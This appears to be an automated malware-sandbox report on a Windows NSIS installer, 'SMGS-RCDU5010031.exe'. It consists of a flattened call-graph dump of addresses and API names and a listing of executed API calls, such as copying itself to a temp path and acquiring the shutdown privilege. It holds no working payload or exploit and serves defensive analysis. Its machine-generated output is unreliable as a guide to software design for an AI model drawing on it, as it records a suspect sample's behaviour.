3967->3968 3969 405a64 CharPrevW 3967->3969 3970 406050 lstrcpynW 3968->3970 3969->3967 3969->3968 3970->3803 3972 402d93 3971->3972 3973 402dab 3971->3973 3974 402da3 3972->3974 3975 402d9c DestroyWindow 3972->3975 3976 402db3 3973->3976 3977 402dbb GetTickCount 3973->3977 3974->3806 3975->3974 4007 406466 3976->4007 3979 402dc9 CreateDialogParamW ShowWindow 3977->3979 3980 402dec 3977->3980 3979->3980 3980->3806 3982->3813 3984 403040 3983->3984 3985 40306e 3984->3985 4013 403258 SetFilePointer 3984->4013 3987 403242 ReadFile 3985->3987 3988 403079 3987->3988 3989 4031c5 3988->3989 3990 4031db 3988->3990 3991 40308b GetTickCount 3988->3991 3989->3820 3992 40321d 3990->3992 3995 4031df 3990->3995 3991->3989 3996 4030da 3991->3996 3994 403242 ReadFile 3992->3994 3993 403242 ReadFile 3993->3996 3994->3989 3995->3989 3997 403242 ReadFile 3995->3997 3998 405cd7 WriteFile 3995->3998 3996->3989 3996->3993 3999 403130 GetTickCount 3996->3999 4000 403155 MulDiv wsprintfW 3996->4000 4011 405cd7 WriteFile 3996->4011 3997->3995 3998->3995 3999->3996 4014 4051af 4000->4014 4025 405ca8 ReadFile 4003->4025 4006->3812 4008 406483 PeekMessageW 4007->4008 4009 402db9 4008->4009 4010 406479 DispatchMessageW 4008->4010 4009->3806 4010->4008 4012 405cf5 4011->4012 4012->3996 4013->3985 4015 4051ca 4014->4015 4024 40526c 4014->4024 4016 4051e6 lstrlenW 4015->4016 4017 406072 18 API calls 4015->4017 4018 4051f4 lstrlenW 4016->4018 4019 40520f 4016->4019 4017->4016 4020 405206 lstrcatW 4018->4020 4018->4024 4021 405222 4019->4021 4022 405215 SetWindowTextW 4019->4022 4020->4019 4023 405228 SendMessageW SendMessageW SendMessageW 4021->4023 4021->4024 4022->4021 4023->4024 4024->3996 4026 403255 4025->4026 4026->3822 4028 403b83 4027->4028 4050 405f97 wsprintfW 4028->4050 4030 403bf4 4031 406072 18 API calls 4030->4031 4032 403c00 SetWindowTextW 4031->4032 4033 403924 4032->4033 4034 403c1c 4032->4034 4033->3836 4034->4033 4035 406072 18 API calls 4034->4035 4035->4034 4037 403978 4036->4037 4038 405f51 RegQueryValueExW 4036->4038 4037->3838 4037->3847 4037->3851 4039 405f72 RegCloseKey 4038->4039 4039->4037 4041->3832 4042->3838 4051 404160 4043->4051 4045 4052cc 4046 404160 SendMessageW 4045->4046 4047 4052de OleUninitialize 4046->4047 4047->3867 4048 4052a5 4048->4045 4054 401389 4048->4054 4050->4030 4052 404178 4051->4052 4053 404169 SendMessageW 4051->4053 4052->4048 4053->4052 4055 401390 4054->4055 4056 4013fe 4055->4056 4057 4013cb MulDiv SendMessageW 4055->4057 4056->4048 4057->4055 4058->3882 4060 405acc 4059->4060 4064 405ade 4059->4064 4061 405ad9 CharNextW 4060->4061 4060->4064 4062 405b02 4061->4062 4062->3885 4062->3886 4063 405a31 CharNextW 4063->4064 4064->4062 4064->4063 4066 4063b4 4065->4066 4067 4063a9 FindClose 4065->4067 4066->3892 4067->4066 4069 403812 4068->4069 4070 4037dc 4069->4070 4071 403817 FreeLibrary GlobalFree 4069->4071 4072 405841 4070->4072 4071->4070 4071->4071 4073 405b0c 18 API calls 4072->4073 4074 405861 4073->4074 4075 405880 4074->4075 4076 405869 DeleteFileW 4074->4076 4078 4059ab 4075->4078 4111 406050 lstrcpynW 4075->4111 4077 4035f2 OleUninitialize 4076->4077 4077->3723 4077->3724 4078->4077 4085 406393 2 API calls 4078->4085 4080 4058a6 4081 4058b9 4080->4081 4082 4058ac lstrcatW 4080->4082 4084 405a50 2 API calls 4081->4084 4083 4058bf 4082->4083 4086 4058cf lstrcatW 4083->4086 4088 4058da lstrlenW FindFirstFileW 4083->4088 4084->4083 4087 4059c5 4085->4087 4086->4088 4087->4077 4089 4059c9 4087->4089 4091 4059a0 4088->4091 4109 4058fc 4088->4109 4090 405a04 3 API calls 4089->4090 4092 4059cf 4090->4092 4091->4078 4094 4057f9 5 API calls 4092->4094 4093 405983 FindNextFileW 4097 405999 FindClose 4093->4097 4093->4109 4096 4059db 4094->4096 4098 4059f5 4096->4098 4099 4059df 4096->4099 4097->4091 4101 4051af 25 API calls 4098->4101 4099->4077 4103 4051af 25 API calls 4099->4103 4101->4077 4102 405841 62 API calls 4102->4109 4104 4059ec 4103->4104 4105 405ef1 38 API calls 4104->4105 4107 4059f3 4105->4107 4106 4051af 25 API calls 4106->4093 4107->4077 4108 4051af 25 API calls 4108->4109 4109->4093 4109->4102 4109->4106 4109->4108 4110 405ef1 38 API calls 4109->4110 4112 406050 lstrcpynW 4109->4112 4113 4057f9 4109->4113 4110->4109 4111->4080 4112->4109 4121 405c00 GetFileAttributesW 4113->4121 4116 405814 RemoveDirectoryW 4118 405822 4116->4118 4117 40581c DeleteFileW 4117->4118 4119 405826 4118->4119 4120 405832 SetFileAttributesW 4118->4120 4119->4109 4120->4119 4122 405c12 SetFileAttributesW 4121->4122 4123 405805 4121->4123 4122->4123 4123->4116 4123->4117 4123->4119 4124->3925 4125->3925 4126->3922 4128 405da7 4127->4128 4129 405dcd GetShortPathNameW 4127->4129 4154 405c25 GetFileAttributesW CreateFileW 4128->4154 4131 405de2 4129->4131 4132 405eec 4129->4132 4131->4132 4134 405dea wsprintfA 4131->4134 4132->3939 4133 405db1 CloseHandle GetShortPathNameW 4133->4132 4135 405dc5 4133->4135 4136 406072 18 API calls 4134->4136 4135->4129 4135->4132 4137 405e12 4136->4137 4155 405c25 GetFileAttributesW CreateFileW 4137->4155 4139 405e1f 4139->4132 4140 405e2e GetFileSize GlobalAlloc 4139->4140 4141 405e50 4140->4141 4142 405ee5 CloseHandle 4140->4142 4143 405ca8 ReadFile 4141->4143 4142->4132 4144 405e58 4143->4144 4144->4142 4156 405b8a lstrlenA 4144->4156 4147 405e83 4149 405b8a 4 API calls 4147->4149 4148 405e6f lstrcpyA 4150 405e91 4148->4150 4149->4150 4151 405ec8 SetFilePointer 4150->4151 4152 405cd7 WriteFile 4151->4152 4153 405ede GlobalFree 4152->4153 4153->4142 4154->4133 4155->4139 4157 405bcb lstrlenA 4156->4157 4158 405bd3 4157->4158 4159 405ba4 lstrcmpiA 4157->4159 4158->4147 4158->4148 4159->4158 4160 405bc2 CharNextA 4159->4160 4160->4157 5246 100010e1 5249 10001111 5246->5249 5247 100011d8 GlobalFree 5248 100012ba 2 API calls 5248->5249 5249->5247 5249->5248 5250 100011d3 5249->5250 5251 10001272 2 API calls 5249->5251 5252 10001164 GlobalAlloc 5249->5252 5253 100011f8 GlobalFree 5249->5253 5254 100012e1 lstrcpyW 5249->5254 5255 100011c4 GlobalFree 5249->5255 5250->5247 5251->5255 5252->5249 5253->5249 5254->5249 5255->5249 4352 405123 4353 405133 4352->4353 4354 405147 4352->4354 4355 405139 4353->4355 4365 405190 4353->4365 4356 40514f IsWindowVisible 4354->4356 4360 40516f 4354->4360 4358 404160 SendMessageW 4355->4358 4359 40515c 4356->4359 4356->4365 4357 405195 CallWindowProcW 4361 405143 4357->4361 4358->4361 4366 404a79 SendMessageW 4359->4366 4360->4357 4371 404af9 4360->4371 4365->4357 4367 404ad8 SendMessageW 4366->4367 4368 404a9c GetMessagePos ScreenToClient SendMessageW 4366->4368 4369 404ad0 4367->4369 4368->4369 4370 404ad5 4368->4370 4369->4360 4370->4367 4380 406050 lstrcpynW 4371->4380 4373 404b0c 4381 405f97 wsprintfW 4373->4381 4375 404b16 4376 40140b 2 API calls 4375->4376 4377 404b1f 4376->4377 4382 406050 lstrcpynW 4377->4382 4379 404b26 4379->4365 4380->4373 4381->4375 4382->4379 5256 401ca3 5257 402ba2 18 API calls 5256->5257 5258 401ca9 IsWindow 5257->5258 5259 401a05 5258->5259 5260 402a27 SendMessageW 5261 402a41 InvalidateRect 5260->5261 5262 402a4c 5260->5262 5261->5262 5263 404228 lstrcpynW lstrlenW 4463 40242a 4474 402cc9 4463->4474 4465 402434 4466 402bbf 18 API calls 4465->4466 4467 40243d 4466->4467 4468 402448 RegQueryValueExW 4467->4468 4472 40281e 4467->4472 4469 40246e RegCloseKey 4468->4469 4470 402468 4468->4470 4469->4472 4470->4469 4478 405f97 wsprintfW 4470->4478 4475 402bbf 18 API calls 4474->4475 4476 402ce2 4475->4476 4477 402cf0 RegOpenKeyExW 4476->4477 4477->4465 4478->4469 4479 404b2b GetDlgItem GetDlgItem 4480 404b7d 7 API calls 4479->4480 4488 404d96 4479->4488 4481 404c20 DeleteObject 4480->4481 4482 404c13 SendMessageW 4480->4482 4483 404c29 4481->4483 4482->4481 4484 404c38 4483->4484 4485 404c60 4483->4485 4487 406072 18 API calls 4484->4487 4535 404114 4485->4535 4486 404f26 4493 404f30 SendMessageW 4486->4493 4494 404f38 4486->4494 4495 404c42 SendMessageW SendMessageW 4487->4495 4489 404e5b 4488->4489 4491 404e7a 4488->4491 4496 404df6 4488->4496 4489->4491 4501 404e6c SendMessageW 4489->4501 4491->4486 4492 40510e 4491->4492 4499 404ed3 SendMessageW 4491->4499 4543 40417b 4492->4543 4493->4494 4505 404f51 4494->4505 4506 404f4a ImageList_Destroy 4494->4506 4519 404f61 4494->4519 4495->4483 4502 404a79 5 API calls 4496->4502 4497 404c74 4498 404114 19 API calls 4497->4498 4518 404c82 4498->4518 4499->4492 4503 404ee8 SendMessageW 4499->4503 4501->4491 4516 404e07 4502->4516 4509 404efb 4503->4509 4507 404f5a GlobalFree 4505->4507 4505->4519 4506->4505 4507->4519 4508 404d57 GetWindowLongW SetWindowLongW 4512 404d70 4508->4512 4520 404f0c SendMessageW 4509->4520 4510 4050d0 4510->4492 4511 4050e2 ShowWindow GetDlgItem ShowWindow 4510->4511 4511->4492 4513 404d76 ShowWindow 4512->4513 4514 404d8e 4512->4514 4538 404149 SendMessageW 4513->4538 4539 404149 SendMessageW 4514->4539 4516->4489 4517 404cd2 SendMessageW 4517->4518 4518->4508 4518->4517 4521 404d51 4518->4521 4523 404d0e SendMessageW 4518->4523 4524 404d1f SendMessageW 4518->4524 4519->4510 4525 404af9 4 API calls 4519->4525 4530 404f9c 4519->4530 4520->4486 4521->4508 4521->4512 4523->4518 4524->4518 4525->4530 4526 404d89 4526->4492 4527 4050a6 InvalidateRect 4527->4510 4528 4050bc 4527->4528 4540 404a34 4528->4540 4529 404fca SendMessageW 4531 404fe0 4529->4531 4530->4529 4530->4531 4531->4527 4533 405041 4531->4533 4534 405054 SendMessageW SendMessageW 4531->4534 4533->4534 4534->4531 4536 406072 18 API calls 4535->4536 4537 40411f SetDlgItemTextW 4536->4537 4537->4497 4538->4526 4539->4488 4557 40496b 4540->4557 4542 404a49 4542->4510 4544 404193 GetWindowLongW 4543->4544 4554 40421c 4543->4554 4545 4041a4 4544->4545 4544->4554 4546 4041b3 GetSysColor 4545->4546 4547 4041b6 4545->4547 4546->4547 4548 4041c6 SetBkMode 4547->4548 4549 4041bc SetTextColor 4547->4549 4550 4041e4 4548->4550 4551 4041de GetSysColor 4548->4551 4549->4548 4552 4041f5 4550->4552 4553 4041eb SetBkColor 4550->4553 4551->4550 4552->4554 4555 404208 DeleteObject 4552->4555 4556 40420f CreateBrushIndirect 4552->4556 4553->4552 4555->4556 4556->4554 4558 404984 4557->4558 4559 406072 18 API calls 4558->4559 4560 4049e8 4559->4560 4561 406072 18 API calls 4560->4561 4562 4049f3 4561->4562 4563 406072 18 API calls 4562->4563 4564 404a09 lstrlenW wsprintfW SetDlgItemTextW 4563->4564 4564->4542 5264 40172d 5265 402bbf 18 API calls 5264->5265 5266 401734 SearchPathW 5265->5266 5267 40174f 5266->5267 5268 4045af 5269 4045db 5268->5269 5270 4045ec 5268->5270 5329 405779 GetDlgItemTextW 5269->5329 5272 4045f8 GetDlgItem 5270->5272 5277 404657 5270->5277 5274 40460c 5272->5274 5273 4045e6 5276 4062e4 5 API calls 5273->5276 5279 404620 SetWindowTextW 5274->5279 5284 405aaf 4 API calls 5274->5284 5275 40473b 5326 4048ea 5275->5326 5331 405779 GetDlgItemTextW 5275->5331 5276->5270 5277->5275 5281 406072 18 API calls 5277->5281 5277->5326 5282 404114 19 API calls 5279->5282 5280 40476b 5285 405b0c 18 API calls 5280->5285 5286 4046cb SHBrowseForFolderW 5281->5286 5287 40463c 5282->5287 5283 40417b 8 API calls 5288 4048fe 5283->5288 5289 404616 5284->5289 5290 404771 5285->5290 5286->5275 5291 4046e3 CoTaskMemFree 5286->5291 5292 404114 19 API calls 5287->5292 5289->5279 5293 405a04 3 API calls 5289->5293 5332 406050 lstrcpynW 5290->5332 5294 405a04 3 API calls 5291->5294 5295 40464a 5292->5295 5293->5279 5296 4046f0 5294->5296 5330 404149 SendMessageW 5295->5330 5299 404727 SetDlgItemTextW 5296->5299 5304 406072 18 API calls 5296->5304 5299->5275 5300 404650 5302 40642a 5 API calls 5300->5302 5301 404788 5303 40642a 5 API calls 5301->5303 5302->5277 5311 40478f 5303->5311 5305 40470f lstrcmpiW 5304->5305 5305->5299 5308 404720 lstrcatW 5305->5308 5306 4047d0 5333 406050 lstrcpynW 5306->5333 5308->5299 5309 4047d7 5310 405aaf 4 API calls 5309->5310 5312 4047dd GetDiskFreeSpaceW 5310->5312 5311->5306 5314 405a50 2 API calls 5311->5314 5316 404828 5311->5316 5315 404801 MulDiv 5312->5315 5312->5316 5314->5311 5315->5316 5317 404a34 21 API calls 5316->5317 5327 404899 5316->5327 5320 404886 5317->5320 5318 40140b 2 API calls 5319 4048bc 5318->5319 5334 404136 EnableWindow 5319->5334 5322 40489b SetDlgItemTextW 5320->5322 5323 40488b 5320->5323 5322->5327 5325 40496b 21 API calls 5323->5325 5324 4048d8 5324->5326 5335 404544 5324->5335 5325->5327 5326->5283 5327->5318 5327->5319 5329->5273 5330->5300 5331->5280 5332->5301 5333->5309 5334->5324 5336 404552 5335->5336 5337 404557 SendMessageW 5335->5337 5336->5337 5337->5326 5338 4042b1 5339 4042c9 5338->5339 5343 4043e3 5338->5343 5344 404114 19 API calls 5339->5344 5340 40444d 5341 40451f 5340->5341 5342 404457 GetDlgItem 5340->5342 5349 40417b 8 API calls 5341->5349 5345 4044e0 5342->5345 5346 404471 5342->5346 5343->5340 5343->5341 5347 40441e GetDlgItem SendMessageW 5343->5347 5348 404330 5344->5348 5345->5341 5354 4044f2 5345->5354 5346->5345 5353 404497 6 API calls 5346->5353 5369 404136 EnableWindow 5347->5369 5351 404114 19 API calls 5348->5351 5352 40451a 5349->5352 5356 40433d CheckDlgButton 5351->5356 5353->5345 5357 404508 5354->5357 5358 4044f8 SendMessageW 5354->5358 5355 404448 5360 404544 SendMessageW 5355->5360 5367 404136 EnableWindow 5356->5367 5357->5352 5359 40450e SendMessageW 5357->5359 5358->5357 5359->5352 5360->5340 5362 40435b GetDlgItem 5368 404149 SendMessageW 5362->5368 5364 404371 SendMessageW 5365 404397 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5364->5365 5366 40438e GetSysColor 5364->5366 5365->5352 5366->5365 5367->5362 5368->5364 5369->5355 5370 4027b4 5371 4027ba 5370->5371 5372 4027c2 FindClose 5371->5372 5373 402a4c 5371->5373 5372->5373 4571 401b37 4572 401b44 4571->4572 4573 401b88 4571->4573 4580 401bcd 4572->4580 4581 401b5b 4572->4581 4574 401bb2 GlobalAlloc 4573->4574 4575 401b8d 4573->4575 4577 406072 18 API calls 4574->4577 4586 402288 4575->4586 4592 406050 lstrcpynW 4575->4592 4576 406072 18 API calls 4579 402282 4576->4579 4577->4580 4584 405795 MessageBoxIndirectW 4579->4584 4580->4576 4580->4586 4590 406050 lstrcpynW 4581->4590 4582 401b9f GlobalFree 4582->4586 4584->4586 4585 401b6a 4591 406050 lstrcpynW 4585->4591 4588 401b79 4593 406050 lstrcpynW 4588->4593 4590->4585 4591->4588 4592->4582 4593->4586 5374 402537 5375 402562 5374->5375 5376 40254b 5374->5376 5377 402596 5375->5377 5378 402567 5375->5378 5379 402ba2 18 API calls 5376->5379 5381 402bbf 18 API calls 5377->5381 5380 402bbf 18 API calls 5378->5380 5382 402552 5379->5382 5383 40256e WideCharToMultiByte lstrlenA 5380->5383 5384 40259d lstrlenW 5381->5384 5385 4025e0 5382->5385 5386 4025ca 5382->5386 5388 405d06 5 API calls 5382->5388 5383->5382 5384->5382 5386->5385 5387 405cd7 WriteFile 5386->5387 5387->5385 5388->5386 5389 4014b8 5390 4014be 5389->5390 5391 401389 2 API calls 5390->5391 5392 4014c6 5391->5392 4618 4015b9 4619 402bbf 18 API calls 4618->4619 4620 4015c0 4619->4620 4621 405aaf 4 API calls 4620->4621 4634 4015c9 4621->4634 4622 401629 4624 40165b 4622->4624 4625 40162e 4622->4625 4623 405a31 CharNextW 4623->4634 4627 401423 25 API calls 4624->4627 4626 401423 25 API calls 4625->4626 4628 401635 4626->4628 4633 401653 4627->4633 4637 406050 lstrcpynW 4628->4637 4629 4056fb 2 API calls 4629->4634 4631 405718 5 API calls 4631->4634 4632 401642 SetCurrentDirectoryW 4632->4633 4634->4622 4634->4623 4634->4629 4634->4631 4635 40160f GetFileAttributesW 4634->4635 4636 40567e 4 API calls 4634->4636 4635->4634 4636->4634 4637->4632 5393 40293b 5394 402ba2 18 API calls 5393->5394 5395 402941 5394->5395 5396 402964 5395->5396 5397 40297d 5395->5397 5405 40281e 5395->5405 5398 40297a 5396->5398 5402 402969 5396->5402 5399 402993 5397->5399 5400 402987 5397->5400 5408 405f97 wsprintfW 5398->5408 5401 406072 18 API calls 5399->5401 5403 402ba2 18 API calls 5400->5403 5401->5405 5407 406050 lstrcpynW 5402->5407 5403->5405 5407->5405 5408->5405 4655 403c3c 4656 403c54 4655->4656 4657 403d8f 4655->4657 4656->4657 4658 403c60 4656->4658 4659 403da0 GetDlgItem GetDlgItem 4657->4659 4664 403de0 4657->4664 4661 403c6b SetWindowPos 4658->4661 4662 403c7e 4658->4662 4663 404114 19 API calls 4659->4663 4660 403e3a 4665 404160 SendMessageW 4660->4665 4674 403d8a 4660->4674 4661->4662 4666 403c83 ShowWindow 4662->4666 4667 403c9b 4662->4667 4668 403dca SetClassLongW 4663->4668 4664->4660 4669 401389 2 API calls 4664->4669 4715 403e4c 4665->4715 4666->4667 4670 403ca3 DestroyWindow 4667->4670 4671 403cbd 4667->4671 4672 40140b 2 API calls 4668->4672 4673 403e12 4669->4673 4675 4040be 4670->4675 4676 403cc2 SetWindowLongW 4671->4676 4677 403cd3 4671->4677 4672->4664 4673->4660 4680 403e16 SendMessageW 4673->4680 4675->4674 4686 4040ce ShowWindow 4675->4686 4676->4674 4678 403d7c 4677->4678 4679 403cdf GetDlgItem 4677->4679 4685 40417b 8 API calls 4678->4685 4683 403cf2 SendMessageW IsWindowEnabled 4679->4683 4684 403d0f 4679->4684 4680->4674 4681 40140b 2 API calls 4681->4715 4682 40409f DestroyWindow EndDialog 4682->4675 4683->4674 4683->4684 4688 403d1c 4684->4688 4689 403d63 SendMessageW 4684->4689 4690 403d2f 4684->4690 4699 403d14 4684->4699 4685->4674 4686->4674 4687 406072 18 API calls 4687->4715 4688->4689 4688->4699 4689->4678 4693 403d37 4690->4693 4694 403d4c 4690->4694 4692 403d4a 4692->4678 4697 40140b 2 API calls 4693->4697 4696 40140b 2 API calls 4694->4696 4695 404114 19 API calls 4695->4715 4698 403d53 4696->4698 4697->4699 4698->4678 4698->4699 4729 4040ed 4699->4729 4700 404114 19 API calls 4701 403ec7 GetDlgItem 4700->4701 4702 403ee4 ShowWindow KiUserCallbackDispatcher 4701->4702 4703 403edc 4701->4703 4726 404136 EnableWindow 4702->4726 4703->4702 4705 403f0e EnableWindow 4708 403f22 4705->4708 4706 403f27 GetSystemMenu EnableMenuItem SendMessageW 4707 403f57 SendMessageW 4706->4707 4706->4708 4707->4708 4708->4706 4727 404149 SendMessageW 4708->4727 4728 406050 lstrcpynW 4708->4728 4711 403f85 lstrlenW 4712 406072 18 API calls 4711->4712 4713 403f9b SetWindowTextW 4712->4713 4714 401389 2 API calls 4713->4714 4714->4715 4715->4674 4715->4681 4715->4682 4715->4687 4715->4695 4715->4700 4716 403fdf DestroyWindow 4715->4716 4716->4675 4717 403ff9 CreateDialogParamW 4716->4717 4717->4675 4718 40402c 4717->4718 4719 404114 19 API calls 4718->4719 4720 404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4719->4720 4721 401389 2 API calls 4720->4721 4722 40407d 4721->4722 4722->4674 4723 404085 ShowWindow 4722->4723 4724 404160 SendMessageW 4723->4724 4725 40409d 4724->4725 4725->4675 4726->4705 4727->4708 4728->4711 4730 4040f4 4729->4730 4731 4040fa SendMessageW 4729->4731 4730->4731 4731->4692 5409 10002a7f 5410 10002a97 5409->5410 5411 1000158f 2 API calls 5410->5411 5412 10002ab2 5411->5412

                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                          Function 004032A0 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401stringfilecomCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 0 4032a0-4032d3 SetErrorMode GetVersion 1 4032d5-4032dd call 40642a 0->1 2 4032e6 0->2 1->2 8 4032df 1->8 4 4032eb-4032ff call 4063ba lstrlenA 2->4 9 403301-403375 call 40642a * 2 #17 OleInitialize SHGetFileInfoW call 406050 GetCommandLineW call 406050 GetModuleHandleW 4->9 8->2 18 403377-40337e 9->18 19 40337f-403399 call 405a31 CharNextW 9->19 18->19 22 4034b0-4034ca GetTempPathW call 40326f 19->22 23 40339f-4033a5 19->23 32 403522-40353c DeleteFileW call 402dee 22->32 33 4034cc-4034ea GetWindowsDirectoryW lstrcatW call 40326f 22->33 25 4033a7-4033ac 23->25 26 4033ae-4033b2 23->26 25->25 25->26 27 4033b4-4033b8 26->27 28 4033b9-4033bd 26->28 27->28 30 4033c3-4033c9 28->30 31 40347c-403489 call 405a31 28->31 35 4033e4-40341d 30->35 36 4033cb-4033d3 30->36 46 40348b-40348c 31->46 47 40348d-403493 31->47 48 403542-403548 32->48 49 4035ed-4035fd call 4037bf OleUninitialize 32->49 33->32 52 4034ec-40351c GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 33->52 43 40343a-403474 35->43 44 40341f-403424 35->44 41 4033d5-4033d8 36->41 42 4033da 36->42 41->35 41->42 42->35 43->31 51 403476-40347a 43->51 44->43 50 403426-40342e 44->50 46->47 47->23 53 403499 47->53 54 4035dd-4035e4 call 403899 48->54 55 40354e-403559 call 405a31 48->55 69 403723-403729 49->69 70 403603-403613 call 405795 ExitProcess 49->70 57 403430-403433 50->57 58 403435 50->58 51->31 59 40349b-4034a9 call 406050 51->59 52->32 52->49 61 4034ae 53->61 68 4035e9 54->68 73 4035a7-4035b1 55->73 74 40355b-403590 55->74 57->43 57->58 58->43 59->61 61->22 68->49 71 4037a7-4037af 69->71 72 40372b-403741 GetCurrentProcess OpenProcessToken 69->72 79 4037b1 71->79 80 4037b5-4037b9 ExitProcess 71->80 76 403743-403771 LookupPrivilegeValueW AdjustTokenPrivileges 72->76 77 403777-403785 call 40642a 72->77 81 4035b3-4035c1 call 405b0c 73->81 82 403619-40362d call 405718 lstrcatW 73->82 78 403592-403596 74->78 76->77 96 403793-40379e ExitWindowsEx 77->96 97 403787-403791 77->97 85 403598-40359d 78->85 86 40359f-4035a3 78->86 79->80 81->49 93 4035c3-4035d9 call 406050 * 2 81->93 94 40363a-403654 lstrcatW lstrcmpiW 82->94 95 40362f-403635 lstrcatW 82->95 85->86 91 4035a5 85->91 86->78 86->91 91->73 93->54 94->49 99 403656-403659 94->99 95->94 96->71 100 4037a0-4037a2 call 40140b 96->100 97->96 97->100 102 403662 call 4056fb 99->102 103 40365b-403660 call 40567e 99->103 100->71 111 403667-403675 SetCurrentDirectoryW 102->111 103->111 112 403682-4036ab call 406050 111->112 113 403677-40367d call 406050 111->113 117 4036b0-4036cc call 406072 DeleteFileW 112->117 113->112 120 40370d-403715 117->120 121 4036ce-4036de CopyFileW 117->121 120->117 123 403717-40371e call 405ef1 120->123 121->120 122 4036e0-403700 call 405ef1 call 406072 call 405730 121->122 122->120 132 403702-403709 CloseHandle 122->132 123->49 132->120
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004032C3
                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 004032C9
                                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                                                                                                                                                                          • #17.COMCTL32(00000007,00000009), ref: 00403315
                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040331C
                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(Snubbendes Setup,NSIS Error), ref: 0040334D
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00000000), ref: 00403360
                                                                                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00000020), ref: 00403387
                                                                                                                                                                                                            • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                                                                                                                            • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                                                                                                                                                                            • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Snubbendes Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 004035F2
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403613
                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403626
                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403635
                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403640
                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00000000,?), ref: 0040364C
                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                                                                                                                                                                          • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\SMGS-RCDU5010031.exe,0042AA08,?), ref: 004036D6
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004037B9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
